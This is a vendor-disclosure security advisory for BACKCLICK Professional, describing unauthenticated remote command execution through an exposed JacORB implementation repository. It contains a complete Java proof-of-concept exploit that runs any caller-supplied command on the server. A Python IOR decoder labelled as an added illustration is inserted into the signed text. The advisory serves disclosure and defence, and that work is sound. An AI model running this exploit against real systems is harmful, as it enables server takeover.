-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-034
Product: BACKCLICK
Manufacturer: BACKCLICK GmbH
Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises)
Vulnerability Type: CWE-306: Missing Authentication for Critical Function
Risk Level: High
Solution Status: Unknown
Manufacturer Notification: 2022-05-25
Public Disclosure: 2022-11-14
CVE Reference: CVE-2022-43999
Author of Advisory: Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

BACKCLICK is a web application used for e-mail marketing and the
creation of newsletters.

The German manufacturer describes the product as follows (see [1],
translated from German):

"BACKCLICK is a web-based enterprise e-mail marketing solution and
newsletter software with which you can create e-mail campaigns and
newsletters online and send them to your customers."

Because CORBA management services are exposed on the network without
authentication, arbitrary system commands can be executed on the server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Alongside the CORBA services used internally by the application, a
JacORB implementation repository (IMR) service is exposed on TCP port
65501.

The interoperable object reference (IOR) required to address the IMR is
predictable: it consists of nothing more than the host, the port and a
fixed object key ("the_ImR/ImRPOA/ImR"), so anyone who can reach the
port can construct it without any prior knowledge of the installation.

The IMR allows dynamic registration and activation of additional servers
without authentication. The command line to be run for such a server is
chosen by the caller, so registering and starting a server executes an
arbitrary system command on the host that runs the IMR.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The Java exploit code below uses the JacORB client library to construct
the IOR, invoke the IMR service, and register and start a new server
instance. The command line to be invoked is taken from the program
arguments.
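To make the "predictable IOR" concrete, the following Python script (an added illustration, not part of the advisory or of the BACKCLICK/JacORB code) encodes and decodes a stringified IOR with a single IIOP 1.2 profile, using the object key and type ID from the PoC. It can be used to recognise whether an IOR pulled out of a capture or a service probe points at the JacORB IMR admin object. The CDR encoder and decoder are minimal, big-endian-only on the encoding side, and cover just the types an IOR needs; the host 192.0.2.10 is a constructed sample value.

```python
import struct

# Object key and type ID of the JacORB IMR admin object, as used in the PoC.
IMR_OBJECT_KEY = b"the_ImR/ImRPOA/ImR"
IMR_TYPE_ID = "IDL:org/jacorb/imr/ImplementationRepository:1.0"
TAG_INTERNET_IOP = 0


class CdrEncoder:
    """Minimal big-endian CDR encapsulation encoder. Alignment is relative
    to the start of the encapsulation, where offset 0 is the byte-order flag."""

    def __init__(self):
        self.buf = bytearray(b"\x00")  # byte-order flag: 0 = big-endian

    def align(self, n):
        self.buf += b"\x00" * ((-len(self.buf)) % n)

    def octet(self, v):
        self.buf.append(v)

    def ushort(self, v):
        self.align(2)
        self.buf += struct.pack(">H", v)

    def ulong(self, v):
        self.align(4)
        self.buf += struct.pack(">I", v)

    def octets(self, data):          # sequence<octet>: length, then bytes
        self.ulong(len(data))
        self.buf += data

    def string(self, s):             # CDR strings carry a trailing NUL
        self.octets(s.encode("utf-8") + b"\x00")


class CdrDecoder:
    """Decoder counterpart; honours the byte-order flag of the encapsulation."""

    def __init__(self, data):
        self.data, self.pos = data, 1
        self.fmt = "<" if data[0] == 1 else ">"

    def align(self, n):
        self.pos += (-self.pos) % n

    def octet(self):
        self.pos += 1
        return self.data[self.pos - 1]

    def ushort(self):
        self.align(2)
        (v,) = struct.unpack_from(self.fmt + "H", self.data, self.pos)
        self.pos += 2
        return v

    def ulong(self):
        self.align(4)
        (v,) = struct.unpack_from(self.fmt + "I", self.data, self.pos)
        self.pos += 4
        return v

    def octets(self):
        n = self.ulong()
        self.pos += n
        return bytes(self.data[self.pos - n:self.pos])

    def string(self):
        return self.octets()[:-1].decode("utf-8")


def build_ior(host, port, object_key=IMR_OBJECT_KEY, type_id=IMR_TYPE_ID):
    """Stringified IOR with one IIOP 1.2 profile and no tagged components,
    the same shape the Java PoC builds with ProfileBody_1_1."""
    body = CdrEncoder()
    body.octet(1)                    # IIOP version major
    body.octet(2)                    # IIOP version minor
    body.string(host)
    body.ushort(port)
    body.octets(object_key)
    body.ulong(0)                    # empty sequence<TaggedComponent>

    ior = CdrEncoder()
    ior.string(type_id)
    ior.ulong(1)                     # one TaggedProfile follows
    ior.ulong(TAG_INTERNET_IOP)
    ior.octets(bytes(body.buf))      # profile_data is itself an encapsulation
    return "IOR:" + bytes(ior.buf).hex()


def parse_ior(ior_str):
    """Decode a stringified IOR into its type_id and IIOP profiles."""
    if not ior_str.startswith("IOR:"):
        raise ValueError("not a stringified IOR")
    dec = CdrDecoder(bytes.fromhex(ior_str[4:]))
    result = {"type_id": dec.string(), "profiles": []}
    for _ in range(dec.ulong()):
        tag, data = dec.ulong(), dec.octets()
        if tag != TAG_INTERNET_IOP:
            continue                 # other profile types are skipped
        p = CdrDecoder(data)
        major, minor = p.octet(), p.octet()
        profile = {"version": (major, minor), "host": p.string(),
                   "port": p.ushort(), "object_key": p.octets()}
        if (major, minor) >= (1, 1):
            profile["components"] = p.ulong()   # only the count is read here
        result["profiles"].append(profile)
    return result


def looks_like_jacorb_imr(ior_str):
    """True when the IOR points at the JacORB IMR admin object abused above."""
    parsed = parse_ior(ior_str)
    return parsed["type_id"] == IMR_TYPE_ID or any(
        p["object_key"] == IMR_OBJECT_KEY for p in parsed["profiles"])


if __name__ == "__main__":
    ref = build_ior("192.0.2.10", 65501)   # constructed sample host
    print(ref)
    print(parse_ior(ref))
    print("IMR reference:", looks_like_jacorb_imr(ref))
```

The point the script makes is that nothing in the reference is secret: the type ID and object key are fixed by JacORB, and the remaining fields are just the address that is already known to whoever scanned the port.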
-----
import java.nio.charset.StandardCharsets;
import java.util.Properties;

import org.jacorb.imr.Admin;
import org.jacorb.imr.AdminHelper;
import org.jacorb.imr.HostInfo;
import org.jacorb.imr.ServerInfo;
import org.jacorb.imr.UnknownServerName;
import org.jacorb.orb.CDROutputStream;
import org.jacorb.orb.ParsedIOR;
import org.omg.IIOP.ProfileBody_1_1;
import org.omg.IIOP.ProfileBody_1_1Helper;
import org.omg.IIOP.Version;
import org.omg.IOP.IOR;
import org.omg.IOP.TAG_INTERNET_IOP;
import org.omg.IOP.TaggedComponent;
import org.omg.IOP.TaggedProfile;

public class ExploitJacorbIOR {

    public static void main(String[] args) throws Exception {
        System.setProperty("org.omg.CORBA.ORBClass", "org.jacorb.orb.ORB");
        System.setProperty("org.omg.CORBA.ORBSingletonClass", "org.jacorb.orb.ORBSingleton");

        if (args.length < 3) {
            System.out.println("ExploitJacorbIOR <ip> <port> <command> [<arg> ...]");
            return;
        }
        String ip = args[0];
        short port = (short) Integer.parseInt(args[1]);
        StringBuilder cmd = new StringBuilder(args[2]);
        for (int i = 3; i < args.length; i++) {
            cmd.append(' ');
            cmd.append(args[i]);
        }

        // sane defaults
        String host = "localhost";
        String key = "the_ImR/ImRPOA/ImR";

        org.omg.CORBA.ORB orb = org.omg.CORBA.ORB.init(new String[0], null);

        // create suitable IOR: one IIOP 1.2 profile with the fixed IMR object key
        IOR ior = new IOR();
        ior.type_id = "IDL:org/jacorb/imr/ImplementationRepository:1.0";
        CDROutputStream cds = (CDROutputStream) orb.create_output_stream();
        cds.beginEncapsulatedArray();
        ProfileBody_1_1 body = new ProfileBody_1_1();
        body.iiop_version = new Version((byte) 1, (byte) 2);
        body.host = ip;
        body.port = (short) port;
        body.object_key = key.getBytes(StandardCharsets.UTF_8);
        body.components = new TaggedComponent[0];
        ProfileBody_1_1Helper.write(cds, body);
        ior.profiles = new TaggedProfile[] {
            new TaggedProfile(TAG_INTERNET_IOP.value, cds.getBufferCopy())
        };
        String createdIOR = new ParsedIOR((org.jacorb.orb.ORB) orb, ior).getIORString();

        // dereference IOR: hand it to a fresh ORB as the initial IMR reference
        Properties props = new Properties();
        props.setProperty("ORBInitRef.ImplementationRepository", createdIOR);
        props.setProperty("jacorb.use_imr", "on");
        orb = org.omg.CORBA.ORB.init((String[]) args, props);
        Admin admin = AdminHelper.narrow(orb.resolve_initial_references("ImplementationRepository"));

        // use service to register and start server
        HostInfo[] hosts = admin.list_hosts();
        if (hosts.length > 0) {
            host = hosts[0].name;
        }
        try {
            ServerInfo i = null;
            try {
                i = admin.get_server_info("Exploit");
            } catch (UnknownServerName e) {
            }
            if (i != null) {
                admin.unregister_server("Exploit");
            }
            // the "command" argument is the command line the IMR will run for this server
            admin.register_server("Exploit", cmd.toString(), host);
        } catch (Exception e) {
            e.printStackTrace();
        }

        // starting the server makes the IMR execute the registered command line
        admin.start_server("Exploit");
        admin.unregister_server("Exploit");
    }
}
-----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Contact vendor for solution.

Until a fix is available, exposure can be reduced by restricting network
access to the IMR port (65501) to hosts that genuinely need it, since the
service itself performs no authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-05-25: Vulnerabilities reported to manufacturer
2022-06-28: Advisories provided again, as originals were not received
2022-07-20: Confirmation, inquiry regarding reproduction of one issue
2022-11-14: No more information received, public disclosure of vulnerabilities

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for BACKCLICK
    https://www.backclick.de/
[2] SySS Security Advisory SYSS-2022-034
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-034.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc
Key ID: 0x768EFE2BB3E53DDA
Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl
PdoUcQgAmkLcYECw1WDOxDBfpVXz0ILf+nHb7BsNN4/j7Djv5e9suWItHReNzjUV
hqHnZ04Fc5HEkv0gH3DNHd9BxrcI7OirOVaJc9knOBKF2fWLBhnm5TDffzO1axqt
4c/LA6SDmLCJZleAQr6L6/0SgJnsqwnsJcRQEdKKPzgLqSd6jSYJjCNhDm6hQ7Nr
skRqhRl/l4bnQjSxOeNmmV+eh96YwvnLVOyszpG+P7f35x7GqoA4PGDJhHGcRGoD
oNzPg+g9XkjEIO9I4aRjUswvkFiMnRvfRp97Dk5k2SFb3gD7mTFDEG4bjoIGJp2y
lug968BHANY+Iy0HRNCOGN8ka7yYOQ==
=XTDQ
-----END PGP SIGNATURE-----